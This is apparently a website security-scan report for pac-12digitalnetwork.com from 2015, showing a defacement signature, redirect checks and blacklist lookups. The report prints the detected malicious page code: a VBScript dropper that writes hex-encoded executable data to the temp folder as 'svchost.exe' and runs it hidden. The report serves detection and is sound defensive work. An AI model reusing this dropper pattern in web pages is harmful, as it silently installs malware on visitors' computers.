Scanned pages/files
| Request | Server response | Status |
http://pac-12digitalnetwork.com/ | 200 OK Content-Length: 122167 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Deface/Content modification. The following signature was found: HaCkeB BY Med Max X-Sec Team ...[1151 bytes skipped]... 2e; text-decoration: overline underline; } </style> <style>.layermensaje { FONT-SIZE: 10pt; COLOR: #2e2e2e; LINE-HEIGHT: 10pt; FONT-FAMILY: "Arial" } .style1 { color: #FFFFFF; } </style> <p align="center">. <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>HaCkeB BY Med Max X-Sec Team </title> <link href="http://fc06.deviantart.net/fs27/f/2008/145/1/b/The_Big_Blue_X_by_Darkdragon15.jpg" type="image/x- icon" rel="shortcut icon"> </head> <body style="color: rgb(255, 255, 255); background-color: rgb(0, 0, 0); background- image:url('http://img15.hostingpics.net/pics/996304Farouk Zoubir_DZ.jpg'); background-image:url('http://www.up9or.com/up30/14259104772.jpg')" alink="#000099" link ...[122076 bytes skipped]... | ||
http://pac-12digitalnetwork.com/test404page.js | 404 Not Found Content-Length: 3671 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pac-12digitalnetwork.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 15 Jul 2015 19:16:15 GMT
Accept-Ranges: bytes
ETag: "4e68844-1dd37-5151a1da15a80"
Server: Apache/2.2.6
Content-Length: 122167
Content-Type: text/html
Last-Modified: Sat, 02 May 2015 14:26:34 GMT
...122167 bytes of data.
GET / HTTP/1.1
Host: pac-12digitalnetwork.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 15 Jul 2015 19:16:15 GMT
Accept-Ranges: bytes
ETag: "4e68844-1dd37-5151a1da15a80"
Server: Apache/2.2.6
Content-Length: 122167
Content-Type: text/html
Last-Modified: Sat, 02 May 2015 14:26:34 GMT
...122167 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pac-12digitalnetwork.com
Referer: http://www.google.com/search?q=pac-12digitalnetwork.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pac-12digitalnetwork.com
Referer: http://www.google.com/search?q=pac-12digitalnetwork.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pac-12digitalnetwork.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pac-12digitalnetwork.com/
Result: pac-12digitalnetwork.com is not infected or malware details are not published yet.
Result: pac-12digitalnetwork.com is not infected or malware details are not published yet.